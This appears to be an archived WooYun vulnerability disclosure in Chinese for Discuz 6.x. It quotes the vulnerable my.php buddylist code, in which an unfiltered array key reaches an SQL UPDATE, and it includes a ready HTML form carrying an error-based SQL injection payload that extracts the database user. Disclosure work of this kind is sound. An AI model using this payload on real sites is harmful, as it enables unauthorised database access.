乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-22: 细节已通知厂商并且等待厂商处理中 2014-10-23: 厂商已经确认,细节仅向厂商公开 2014-10-26: 细节向第三方安全合作伙伴开放 2014-12-17: 细节向核心白帽子及相关领域专家公开 2014-12-27: 细节向普通白帽子公开 2015-01-06: 细节向实习白帽子公开 2015-01-20: 细节向公众公开
只测试了6.x貌似7.x就修复了
my.php (600) :02} elseif($item == 'buddylist') {03 04 if(!submitcheck('buddysubmit', 1)) {05 $buddylist = array();06 $query = $db->query("SELECT b.*, m.username FROM {$tablepre}buddys b, {$tablepre}members m07 WHERE b.uid='$discuz_uid' AND m.uid=b.buddyid ORDER BY dateline DESC");08 while($buddy = $db->fetch_array($query)) {09 $buddy['dateline'] = gmdate("$dateformat $timeformat", $buddy['dateline'] + $timeoffset * 3600);10 $buddylist[] = $buddy;11 }12 13 } else {14 15 $buddyarray = array();16 $query = $db->query("SELECT * FROM {$tablepre}buddys WHERE uid='$discuz_uid'");17 while($buddy = $db->fetch_array($query)) {18 $buddyarray[$buddy['buddyid']] = $buddy;19 }20 21 if(!empty($delete) && is_array($delete)) {22 $db->query("DELETE FROM {$tablepre}buddys WHERE uid='$discuz_uid' AND buddyid IN ('".implode('\',\'', $delete)."')");23 }24 25 if(is_array($descriptionnew)) {26 27 foreach($descriptionnew as $buddyid => $desc) { //无过滤28 if(($desc = cutstr(dhtmlspecialchars($desc), 255)) != addslashes($buddyarray[$buddyid]['description'])) {29 $db->query("UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='$buddyid'"); //数组key值$buddyid直接带入30 }31 }32 }
上exp了、
<form method='post' action='http://dz6.0/my.php?item=buddylist'><input type='hidden' value="1111" name="descriptionnew[1' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e,0x5430304C5320474F21,0x7e) limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#]" /><br /><input type='submit' value='buddysubmit' name='buddysubmit' /><br /></form>
危害等级:中
漏洞Rank:10
确认时间:2014-10-23 09:03
感谢您提出的问题,不过此版本太老,目前已经不再维护。建议正在使用此程序的站点尽快升级。
暂无